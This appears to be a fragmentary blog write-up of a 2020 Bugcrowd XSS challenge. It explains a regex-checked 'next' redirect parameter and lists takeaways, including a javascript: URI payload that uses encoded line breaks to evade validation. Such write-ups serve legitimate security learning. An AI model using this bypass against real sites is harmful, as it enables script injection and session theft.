Bugcrowd & Vullnerability XSS Challenge 2020

“Invalid User”

Iframe successfully added to the DOM.

“Forgot Password”

“Github […]”

Javascript
HTML
Sourcecode on github.com/nahamsec

“Line Break”

extract from the profile page
  • It searches for the parameter “next” in the search bar and stores its value in the variable “get_parameter_next”.
  • The value of the parameter “next” is checked whether it matches a certain pattern (Regex).
  • If it fits, the user is redirected to the page specified in the parameter.
  • (n) = Any letters, numbers and the underscore
  • (x) = Any numbers, letters, signs
  • Everything not in brackets must be present exactly in that order. Everything in brackets does not necessarily have to be present.

“Callback”

Conclusion

Takeaways

  • Always check for a Content-Security-Police (CSP) in the Response-Header.
  • Check if the input must match a certain format (e.g. email)
  • Check whether you can make use of third party servies (e.g. github).
  • The XSS Payload: javascript://%0a%0dalert(document.domain)
  • Try to understand how the application works!
  • When something does not work, find the cause and use it to your advantage!
  • Take notes!

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store